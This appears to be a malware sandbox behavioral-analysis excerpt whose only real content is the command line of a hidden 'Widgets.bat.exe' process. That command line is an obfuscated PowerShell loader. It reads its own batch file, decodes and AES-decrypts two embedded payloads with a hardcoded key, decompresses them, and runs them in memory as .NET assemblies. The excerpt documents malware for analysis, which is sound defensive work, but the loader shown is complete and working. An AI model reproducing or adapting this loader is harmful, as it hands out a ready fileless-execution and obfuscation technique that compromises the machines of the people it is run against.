Behavioral Analysis

Widgets.bat.exe "C:\Users\test22\AppData\Local\Temp\Widgets.bat.exe" -w hidden -c $XRwR='EnteKHcreKHcyPeKHcoieKHcnteKHc'.Replace('eKHc', '');$JXEu='GeteKHcCueKHcrreKHceneKHctPeKHcroeKHcceeKHcsseKHc'.Replace('eKHc', '');$VrxS='MeKHcaineKHcMoeKHcdueKHcleeKHc'.Replace('eKHc', '');$hmqz='TreKHcaneKHcsfoeKHcrmFeKHcinaleKHcBloeKHcceKHckeKHc'.Replace('eKHc', '');$CquX='SpleKHciteKHc'.Replace('eKHc', '');$qFmP='LeKHcoeKHcaeKHcdeKHc'.Replace('eKHc', '');$EtZB='CeKHcreateKHceDeKHcecryeKHcpeKHctoeKHcreKHc'.Replace('eKHc', '');$pXCM='CeKHchangeKHceeKHcEeKHcxteneKHcsioeKHcneKHc'.Replace('eKHc', '');$xgQY='FieKHcrseKHcteKHc'.Replace('eKHc', '');$xSKJ='FroeKHcmeKHcBaeKHcseeKHc64SeKHctrieKHcngeKHc'.Replace('eKHc', '');$PatU='IneKHcvokeeKHc'.Replace('eKHc', '');$TNPx='ReKHceadeKHcLeKHcieKHcneseKHc'.Replace('eKHc', '');function MvpiL($ktOmn){$YXOrJ=[System.Security.Cryptography.Aes]::Create();$YXOrJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$YXOrJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$YXOrJ.Key=[System.Convert]::$xSKJ('aX8cFQObeptl0Hc2tA0iQqDR9yEcFcjuIlC6FeX9Xos=');$YXOrJ.IV=[System.Convert]::$xSKJ('tojFzsW/v/Dm+adS5TQ3Mg==');$CCPCO=$YXOrJ.$EtZB();$cGSky=$CCPCO.$hmqz($ktOmn,0,$ktOmn.Length);$CCPCO.Dispose();$YXOrJ.Dispose();$cGSky;}function ivaas($ktOmn){$zolTr=New-Object System.IO.MemoryStream(,$ktOmn);$alxWJ=New-Object System.IO.MemoryStream;$yVdFW=New-Object System.IO.Compression.GZipStream($zolTr,[IO.Compression.CompressionMode]::Decompress);$yVdFW.CopyTo($alxWJ);$yVdFW.Dispose();$zolTr.Dispose();$alxWJ.Dispose();$alxWJ.ToArray();}$yjiqq=[System.Linq.Enumerable]::$xgQY([System.IO.File]::$TNPx([System.IO.Path]::$pXCM([System.Diagnostics.Process]::$JXEu().$VrxS.FileName, $null)));$DPSuV=$yjiqq.Substring(3).$CquX(':');$UWCTr=ivaas (MvpiL ([Convert]::$xSKJ($DPSuV[0])));$bpToC=ivaas (MvpiL ([Convert]::$xSKJ($DPSuV[1])));[System.Reflection.Assembly]::$qFmP([byte[]]$bpToC).$XRwR.$PatU($null,$null);[System.Reflection.Assembly]::$qFmP([byte[]]$UWCTr).$XRwR.$PatU($null,$null);